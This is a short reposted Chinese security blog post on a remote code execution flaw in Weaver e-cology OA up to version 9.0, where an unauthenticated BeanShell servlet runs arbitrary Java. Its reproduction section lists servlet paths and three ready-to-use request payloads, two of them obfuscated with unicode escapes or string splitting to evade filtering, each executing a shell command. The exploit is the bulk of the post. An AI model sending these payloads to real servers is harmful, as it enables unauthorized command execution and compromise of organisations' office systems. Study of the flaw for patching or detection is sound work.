泛微e-cology OA 遠程代碼執行漏洞

本文轉載自查看原文 2020-04-07 15:30 3207 web安全

0x00 漏洞原理

該漏洞位於 e-cology OA系統BeanShell組件中，並且該組件允許未授權訪問，攻擊者可通過訪問該組件執行任意的Java代碼，導致遠程命令執行。

0x01影響版本

泛微 e-cology<=9.0

0x02復現

可能的路徑

/weaver/bsh.servlet.BshServlet
/weaveroa/bsh.servlet.BshServlet
/oa/bsh.servlet.BshServlet

payload：

bsh.script=exec("whoami");&bsh.servlet.output=raw
bsh.script=\u0065\u0078\u0065\u0063("whoami");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
bsh.script=eval%00("ex"%2b"ec(bsh.httpServletRequest.getParameter(\\"command\\"))");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami

0x03參考

https://github.com/myzing00/Vulnerability-analysis/tree/master/0917/weaver-oa/CNVD-2019-32204

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 泛微e-cology OA系統遠程代碼執行漏洞及其復現泛微 e-cology OA 遠程代碼執行漏洞復現泛微OA E-cology（CNVD-2019-32204）遠程命令執行漏洞復現分析泛微e-cology和Oracle無法啟動的解決方案 x微E-Cology WorkflowServiceXml RCE 通達OA V11.6 RCE(遠程代碼執行)漏洞復現通達oa遠程代碼執行復現泛微 E9產品服務端技術與藍凌 OA 產品技術 [漏洞復現] 泛微ecology OA數據庫配置信息泄露泛微ecology OA系統某接口存在數據庫配置信息泄露漏洞